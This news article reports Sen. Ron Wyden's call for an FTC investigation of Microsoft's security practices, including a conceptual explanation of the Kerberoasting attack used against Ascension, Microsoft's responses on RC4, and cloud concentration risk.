Wyden demands FTC probe Microsoft for cyber ‘negligence’

• What’s at stake: Widespread vendor concentration could propagate systemic cyber risk across financial services.
• Expert quote: Sen. Wyden accused Microsoft of “gross cybersecurity negligence” and profiting despite contributing to systemic insecurity.
• Supporting data: Cloud market share has driven concentration risks. Market share: AWS 31%, Azure 25%, Google Cloud 11%.

Overview bullets generated by AI with editorial review

Sen. Ron Wyden, a Democrat from Oregon, urged the Federal Trade Commission (FTC) on Wednesday to launch an investigation into Microsoft, accusing the technology giant of “gross cybersecurity negligence” and contributing to ransomware attacks that pose significant threats to critical U.S. infrastructure.

Wyden’s letter to FTC Chair Andrew Ferguson highlighted what he called insecure software practices and Microsoft’s “de facto monopolization” of the enterprise operating system market, asserting that this combination creates a “serious national security threat.”

The senator’s demand focused on a 2024 ransomware attack on Ascension, a major hospital system, which resulted in the theft of sensitive data from 5.6 million patients and disrupted patient care.

This incident, Wyden argued, illustrates the widespread danger stemming from Microsoft’s security shortcomings, a concern highly relevant to U.S. banks and credit unions relying on similar infrastructure.

For its part, Microsoft refuted the specific claims Wyden made in his letter about the causes of the cyberattack against Ascension.

The company has also taken on a campaign it calls its Secure Future Initiative that the company called “the largest cybersecurity engineering project in history” and a “multiyear effort to revolutionize the way we design, build, test, and operate our products and services.”

2024 cyberattack reveals holes in Microsoft defenses

Wyden cited multiple issues with Microsoft’s cybersecurity practices, but the letter’s primary focus is on a technique known as Kerberoasting, which the threat actor in the Ascension incident exploited.

The 2024 cyberattack began when a contractor inadvertently downloaded malware after clicking a malicious link from a Microsoft Bing search result on a Microsoft Edge browser.

This detail, which Wyden said Ascension told his staff, had not been previously reported.

After this initial breach, insecure default settings on Microsoft software allowed the hackers to move laterally within Ascension’s network and gain highly privileged access to its Microsoft Active Directory server, according to Wyden.

Active Directory is a core component of many corporate networks, serving as a critical component for managing and authenticating internal accounts.

Hackers used a technique known as Kerberoasting, an attack that takes place after an initial intrusion into a network, to achieve this privileged access.

In a Kerberoasting attack, after the attacker gains control of an account, they use that access to request authentication with Active Directory using the kerberos protocol. This is known as requesting a kerberos ticket.

This ticket, which authenticates the user, comes encrypted with a password hash — a scrambled, unreadable version of the service account’s password.

An attacker can then take this encrypted ticket, put it on their own computer system, and try to crack the password hash using brute-force techniques — trying various passwords until one of them works.

Once they obtain the password, they can impersonate a legitimate account holder, gaining access to any systems, assets or networks the compromised account is authorized to access.

A key enabler of this attack, according to Wyden, is Microsoft’s continued default support for RC4, which he called an “insecure encryption technology from the 1980s.”

While Microsoft’s software also supports the more secure Advanced Encryption Standard (AES), RC4’s default presence needlessly exposes customers to threats by making Kerberoasting attacks significantly easier to execute, Wyden said.

When AES encryption is used, a stronger password hash is generated, making password cracking much more difficult.

In its response to Wyden’s letter, a Microsoft spokesperson called RC4 an “old standard” that the company discourages customers from using in a variety of documentation.

The spokesperson also said RC4 makes up “less than .1% of our traffic.” However, “disabling its use completely would break many customer systems.”

The spokesperson said the company is “on a path to gradually reduce the extent to which customers can use it” and has it “on our roadmap to ultimately disable its use.”

The spokesperson also said the company has “already removed use of DES,” which like RC4 is an old, insecure encryption standard.

Complaints about publicizing Kerberos vulnerability

Wyden said in his letter that his staff urged Microsoft officials in July last year to warn customers about the Kerberoasting threat. Microsoft subsequently published a blog post in October, recommending actions to protect against Kerberoasting and announced plans for a software update to disable RC4.

However, 11 months later, Microsoft has not released this promised security update, Wyden said.

Microsoft responded to this complaint; in the first quarter of 2026, new installations of Active Directory domains using Windows Server 2025 will have RC4 disabled by default, according to the spokesperson.

Microsoft also plans to include additional mitigations for existing deployments, though the spokesperson did not detail them.

Wyden also criticized Microsoft’s communication strategy, stating that instead of clear guidance for senior executives, Microsoft published a “highly technical blog post on an obscure area of the company’s website on a Friday afternoon.”

He added that Microsoft “took no meaningful steps to publicize this blog post” and “declined to explicitly warn its customers that they are vulnerable to the Kerberoasting hacking technique unless they change the default settings chosen by Microsoft.”

This, he concluded, leaves most Microsoft customers highly susceptible.

Report of ‘inadequate security culture’ and response

This isn’t Wyden’s first challenge to Microsoft’s cybersecurity practices.

In July 2023, he called for investigations into “lax security practices” by Microsoft that “reportedly enabled Chinese espionage” against U.S. government agencies.

A subsequent review by the Cyber Safety Review Board (CSRB), which Wyden and others had requested, concluded that “Microsoft’s security culture was inadequate and requires an overhaul, particularly in light of the company’s centrality in the technology ecosystem and the level of trust customers place in the company to protect their data and operations.”

The CSRB highlighted “a cascade of Microsoft’s avoidable errors that allowed this intrusion to succeed” and its “failure to detect the compromise of its cryptographic crown jewels on its own.”

Following the scathing CSRB report in the summer of 2023, Microsoft launched its Secure Future Initiative (SFI) in November of that year. CEO Satya Nadella said at the time that security had become the company’s “top priority.”

The initiative focused on AI-based cyber defenses, advances in fundamental software engineering and advocacy for stronger international norms.

In April, Microsoft published an SFI progress report, which highlighted a number of specific security improvements, largely around enabling and adopting hardware-based authentication.

It also said it was working to cut the time to mitigate cloud vulnerabilities by 50% and implementing so-called secure by design and secure by default principles, two concepts that federal agencies have pressured software companies to adopt in their software development practices.

Concentration risk

Wyden in his Wednesday letter also alluded to the significant concentration risks prevalent in the cloud services market.

Research released in February by the market intelligence firm Synergy Research Group indicates that Amazon Web Services had 31% of the cloud services market share in the first quarter, Microsoft Azure had 25%, and Google Cloud had 11%.

This market concentration exposes many financial services companies to the same set of physical or cyber risks.

Software companies are a “key source of cyber risk in the economy” due to vulnerabilities spreading through the digital supply chain, according to a research paper published in January by the Social Science Research Network.

Two academics with the NOVA School of Business and Economics and ESADE Business School conducted the research by compiling a database that links software vulnerabilities (discovered between 2006 and 2023) and specific cyberattacks to software companies and their customer firms.

Vulnerabilities from larger software companies are “more harmful” and increase the likelihood of cyberattacks, according to the research. Microsoft, for instance, accounted for the highest number of vulnerabilities (332) and linked to the most customers (742) in one dataset.

Cybersecurity leaders from financial firms have expressed frustration at major cloud providers, finding them unresponsive to security concerns and often charging extra for “foundational controls,” according to Clarissa Banks, CISO for the payments company Deluxe, who made the comments during a 2024 panel at cybersecurity conference RSAC.

Wyden also made this point in his letter on Wednesday.

“Microsoft has become like an arsonist selling firefighting services to their victims,” the senator said. He added that government agencies, companies and nonprofits “have no choice but to continue to use the company’s software, even after they are hacked, because of Microsoft’s near-monopoly over enterprise IT.”